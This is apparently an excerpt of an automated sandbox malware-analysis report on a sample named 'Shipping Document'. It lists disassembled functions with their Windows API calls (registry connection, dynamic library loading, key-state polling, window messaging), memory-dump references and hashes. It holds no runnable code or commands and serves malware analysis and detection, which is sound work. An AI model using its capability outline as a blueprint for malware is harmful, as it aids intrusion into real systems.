                              • Instruction Fuzzy Hash: EB21B3756002269BEF209F6D8C44A9AB7E9AF65720F300699FDE0D72C0D7719441CB50
                              APIs
                              • GetStdHandle.KERNEL32(0000000C), ref: 0102705E
                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01027091
                              • GetStdHandle.KERNEL32(0000000C), ref: 010270A3
                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 010270DD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CreateHandle$FilePipe
                              • String ID: nul
                              • API String ID: 4209266947-2873401336
                              • Opcode ID: b3a11d49d8e0bc51b13580190c0e750dc74b912a2cd0c2abca4486fa60af06c7
                              • Instruction ID: 667eeb727a0b6c34eb994edce771695affcfcd93981e6de1bebaa207bb744663
                              • Opcode Fuzzy Hash: b3a11d49d8e0bc51b13580190c0e750dc74b912a2cd0c2abca4486fa60af06c7
                              • Instruction Fuzzy Hash: 46215378500226DBEF209F2DD884A9EBBE8AF54720F204659FDE1D72D0D775A854CB50
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0102AEBF
                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0102AF13
                              • __swprintf.LIBCMT ref: 0102AF2C
                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0104F910), ref: 0102AF6A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume__swprintf
                              • String ID: %lu
                              • API String ID: 3164766367-685833217
                              • Opcode ID: 2bf1a810b7b67671e08f3e19f7170a95f675acef33c79154f7b9652398cdd307
                              • Instruction ID: 4c2c00a575750cb319ff1ca04871f91dc50ec5dcba29f5d4e39b4fcf1506ac1f
                              • Opcode Fuzzy Hash: 2bf1a810b7b67671e08f3e19f7170a95f675acef33c79154f7b9652398cdd307
                              • Instruction Fuzzy Hash: 1F21B374A0010AAFCB10DF69CD85EEE7BB8EF89704B0040A9F949DB251DB75EE01DB21
                              APIs
                                • Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66
                                • Part of subcall function 0101A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0101A399
                                • Part of subcall function 0101A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0101A3AC
                                • Part of subcall function 0101A37C: GetCurrentThreadId.KERNEL32 ref: 0101A3B3
                                • Part of subcall function 0101A37C: AttachThreadInput.USER32(00000000), ref: 0101A3BA
                              • GetFocus.USER32 ref: 0101A554
                                • Part of subcall function 0101A3C5: GetParent.USER32(?), ref: 0101A3D3
                              • GetClassNameW.USER32(?,?,00000100), ref: 0101A59D
                              • EnumChildWindows.USER32(?,0101A615), ref: 0101A5C5
                              • __swprintf.LIBCMT ref: 0101A5DF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                              • String ID: %s%d
                              • API String ID: 1941087503-1110647743
                              • Opcode ID: 0de4c12516bee203509edf9c1e3c582386a50e91c00c99ced331962ff4edeb0e
                              • Instruction ID: 256e20962f84f14144699c25ace21c93d0077a519203d869c9fb9deed7cdb203
                              • Opcode Fuzzy Hash: 0de4c12516bee203509edf9c1e3c582386a50e91c00c99ced331962ff4edeb0e
                              • Instruction Fuzzy Hash: B811D2B120024ABBDF10BF74DD85FEA37B8AF88300F004069B988AB046CA7859458B34
                              APIs
                              • CharUpperBuffW.USER32(?,?), ref: 01022048
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: BuffCharUpper
                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                              • API String ID: 3964851224-769500911
                              • Opcode ID: 78e1abc6ebf89d506dc433abc0adbfcc19329ce9e55b0a6f0f1140d988ba9fdc
                              • Instruction ID: ed793858fd7ec64ca87c5229499733ed85dad300be1ebab56379cbd311561465
                              • Opcode Fuzzy Hash: 78e1abc6ebf89d506dc433abc0adbfcc19329ce9e55b0a6f0f1140d988ba9fdc
                              • Instruction Fuzzy Hash: 6C115730A0011ACFCF10EFE8DD819EEB7B5FF05314B508898E895A7253EB36694ADB50
                              APIs
                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0103EF1B
                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0103EF4B
                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0103F07E
                              • CloseHandle.KERNEL32(?), ref: 0103F0FF
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                              • String ID:
                              • API String ID: 2364364464-0
                              • Opcode ID: e3cfa107d436488422ffa0cc37defea2ba11fd5f1d29394dc776845417df040e
                              • Instruction ID: df3aa87872ad353d5ed0a9271bddb77a9240b447b540d6319262f0c246f09f00
                              • Opcode Fuzzy Hash: e3cfa107d436488422ffa0cc37defea2ba11fd5f1d29394dc776845417df040e
                              • Instruction Fuzzy Hash: 5981A3716047029FD720DF28CD86F6AB7E5AF88710F04881DF599DB292DBB5AC41CB52
                              APIs
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                                • Part of subcall function 010410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01040038,?,?), ref: 010410BC
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01040388
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010403C7
                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0104040E
                              • RegCloseKey.ADVAPI32(?,?), ref: 0104043A
                              • RegCloseKey.ADVAPI32(00000000), ref: 01040447
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                              • String ID:
                              • API String ID: 3440857362-0
                              • Opcode ID: 8359fee9e7823f4afbe81e2b03ad9f3b734d23e3fde2492e13e51290ceeea4ee
                              • Instruction ID: a30ce784ca45a3799b16d49275c4ad12ae9101022b64bc46adc391e006ce8582
                              • Opcode Fuzzy Hash: 8359fee9e7823f4afbe81e2b03ad9f3b734d23e3fde2492e13e51290ceeea4ee
                              • Instruction Fuzzy Hash: B6516BB1208205AFD700EB68CDC1FAEBBE8FF84704F04896DB59597291DB75E904DB52
                              APIs
                                • Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
                                • Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C
                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0103DC3B
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103DCBE
                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0103DCDA
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103DD1B
                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0103DD35
                                • Part of subcall function 00FC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01027B20,?,?,00000000), ref: 00FC5B8C
                                • Part of subcall function 00FC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01027B20,?,?,00000000,?,?), ref: 00FC5BB0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                              • String ID:
                              • API String ID: 327935632-0
                              • Opcode ID: 4b891774879398b2182f319795e57245eba907d7c9231c35d0bed9743b15b7bf
                              • Instruction ID: 317258707279020feaa332733bbb0fd5d125b78b5685c0e2a7d2f2489d30f095
                              • Opcode Fuzzy Hash: 4b891774879398b2182f319795e57245eba907d7c9231c35d0bed9743b15b7bf
                              • Instruction Fuzzy Hash: 8D514B75A0020A9FCB01EFA8C985DADB7F8FF49310B458099E859AB312DB75ED45CF50
                              APIs
                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0102E88A
                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0102E8B3
                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0102E8F2
                                • Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
                                • Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C
                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0102E917
                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0102E91F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                              • String ID:
                              • API String ID: 1389676194-0
                              • Opcode ID: e956972db2284c8e5dbe2ba37a5a149dcd15c3e0ba9d02b1ba33e3df961d4753
                              • Instruction ID: 5611c9d17f374cdb697c18bdbb9ec496092104dadbae063942f2aed5f722afd7
                              • Opcode Fuzzy Hash: e956972db2284c8e5dbe2ba37a5a149dcd15c3e0ba9d02b1ba33e3df961d4753
                              • Instruction Fuzzy Hash: 53513975A00216DFCF01EF65CA85EAEBBF5EF08310B148099E849AB362CB75ED11DB50
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c6e5d11faf1007f367d778e116e3936d7e81c58f3d994a25bbced3089f2de2b0
                              • Instruction ID: bcbcb2139b6dc539235d2c7b702dfae59c07e5536bd0bcfa6a530d109ac486db
                              • Opcode Fuzzy Hash: c6e5d11faf1007f367d778e116e3936d7e81c58f3d994a25bbced3089f2de2b0
                              • Instruction Fuzzy Hash: 8341F2F9A40104EBD760DA2CC8C8BA9BBA4EB09311F0581B4FAD6A72D1EB7199418A50
                              APIs
                              • GetCursorPos.USER32(?), ref: 00FC2357
                              • ScreenToClient.USER32(010867B0,?), ref: 00FC2374
                              • GetAsyncKeyState.USER32(00000001), ref: 00FC2399
                              • GetAsyncKeyState.USER32(00000002), ref: 00FC23A7
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AsyncState$ClientCursorScreen
                              • String ID:
                              • API String ID: 4210589936-0
                              • Opcode ID: a8e3f2f422ddea6e065144c24bd92e75ee89a2ff9078d077fa9263e47600754a
                              • Instruction ID: c4e3a94b8c58ffd3a4c08037a8ef2764d620fafebaa1f80a9dd48d63747ff2c6
                              • Opcode Fuzzy Hash: a8e3f2f422ddea6e065144c24bd92e75ee89a2ff9078d077fa9263e47600754a
                              • Instruction Fuzzy Hash: A5417F7590415AFBDF159FA8C944FEDBB74FF05320F20431AE968922A0C7356950EB91
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0101695D
                              • TranslateAcceleratorW.USER32(?,?,?), ref: 010169A9
                              • TranslateMessage.USER32(?), ref: 010169D2
                              • DispatchMessageW.USER32(?), ref: 010169DC
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 010169EB
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                              • String ID:
                              • API String ID: 2108273632-0
                              • Opcode ID: 05f2089925491467d09adefc027625dea32ec6231330e0038c4cd0c6a4dd095e
                              • Instruction ID: 6448ce8684e19cc985a6dfb8926db93a50e9d97eed4bbc9878494c838057bdf2
                              • Opcode Fuzzy Hash: 05f2089925491467d09adefc027625dea32ec6231330e0038c4cd0c6a4dd095e
                              • Instruction Fuzzy Hash: 1E31D271904246ABEB71CE799C84FFA7BEDAB05300F1541A9E5E1C3149E7AF9085CBA0
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 01018F12
                              • PostMessageW.USER32(?,00000201,00000001), ref: 01018FBC
                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 01018FC4
                              • PostMessageW.USER32(?,00000202,00000000), ref: 01018FD2
                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 01018FDA
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessagePostSleep$RectWindow
                              • String ID:
                              • API String ID: 3382505437-0
                              • Opcode ID: 04218b4f00b4063eb70ebc0df6de360b3d46488dbd237ccd725e5b0b489d5441
                              • Instruction ID: e8311ddb88a1bd83947fa896efd640e2458f0103f0f77279b77a8a989d35e4c0
                              • Opcode Fuzzy Hash: 04218b4f00b4063eb70ebc0df6de360b3d46488dbd237ccd725e5b0b489d5441
                              • Instruction Fuzzy Hash: 2E31E2B150021AEFDB14CF6CD98CA9E7BB6EB04315F00825AFAA4A71D5C3B49A14CB50
                              APIs
                              • IsWindowVisible.USER32(?), ref: 0101B6C7
                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0101B6E4
                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0101B71C
                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0101B742
                              • _wcsstr.LIBCMT ref: 0101B74C
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                              • String ID:
                              • API String ID: 3902887630-0
                              • Opcode ID: 0d99a397110bc4868b39076c4647db3420bd1a5733c829bde95c27bb34c6ef26
                              • Instruction ID: 6ba0d5035523cbbc7e5efd354a5a689020c9b46c54dc09a0e33df1208e7ec17e
                              • Opcode Fuzzy Hash: 0d99a397110bc4868b39076c4647db3420bd1a5733c829bde95c27bb34c6ef26
                              • Instruction Fuzzy Hash: 12212672204244BBEB255B3E9D49E7B7BFCEF49760F044069FD49CA195EF69C84093A0
                              APIs
                                • Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623
                              • GetWindowLongW.USER32(?,000000F0), ref: 0104B44C
                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0104B471
                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0104B489
                              • GetSystemMetrics.USER32(00000004), ref: 0104B4B2
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,01031184,00000000), ref: 0104B4D0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$Long$MetricsSystem
                              • String ID:
                              • API String ID: 2294984445-0
                              • Opcode ID: db35d7d80c8eb441ebec5811e5755a30a878b386792104cf0bfdee1bc9db3705
                              • Instruction ID: e5fb8a4b3932eecb04c1d6dd58f83a5ad5bb868172b7df00017058fba20510fc
                              • Opcode Fuzzy Hash: db35d7d80c8eb441ebec5811e5755a30a878b386792104cf0bfdee1bc9db3705
                              • Instruction Fuzzy Hash: FE2191B1914226AFDB609E3CCC84B6A3BA4FB45720F114778FAA6D21D0EB31D811CB90
                              APIs
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01019802
                                • Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66
                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01019834
                              • __itow.LIBCMT ref: 0101984C
                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01019874
                              • __itow.LIBCMT ref: 01019885
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$__itow$_memmove
                              • String ID:
                              • API String ID: 2983881199-0
                              • Opcode ID: 8925aad39b58a5547b167b2afdbb38db72fd114280654bc16c6fcd381866a5b9
                              • Instruction ID: 13b15512053ac1b3542e15c554a1d0200f842e123497d3286a06cd652d059443
                              • Opcode Fuzzy Hash: 8925aad39b58a5547b167b2afdbb38db72fd114280654bc16c6fcd381866a5b9
                              • Instruction Fuzzy Hash: 2D210A71B00305FBEB10BA798D8AEEE3BA9EF48714F040069FE45DB241D6788D419791
                              APIs
                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FC134D
                              • SelectObject.GDI32(?,00000000), ref: 00FC135C
                              • BeginPath.GDI32(?), ref: 00FC1373
                              • SelectObject.GDI32(?,00000000), ref: 00FC139C
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ObjectSelect$BeginCreatePath
                              • String ID:
                              • API String ID: 3225163088-0
                              • Opcode ID: 3bd501c344f92b074081890cf2de0605a17b1f5d74c1cbb326e99afa883fe277
                              • Instruction ID: 285cf9a5721d85fc1a86354edc4ff8600707ef4d5e173e2947f373fae6d76dd6
                              • Opcode Fuzzy Hash: 3bd501c344f92b074081890cf2de0605a17b1f5d74c1cbb326e99afa883fe277
                              • Instruction Fuzzy Hash: 6E21D8B0C14346DFDB208F54DA09B6D3BB8FB11325F21431AF4C496195D37B8861EB50
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memcmp
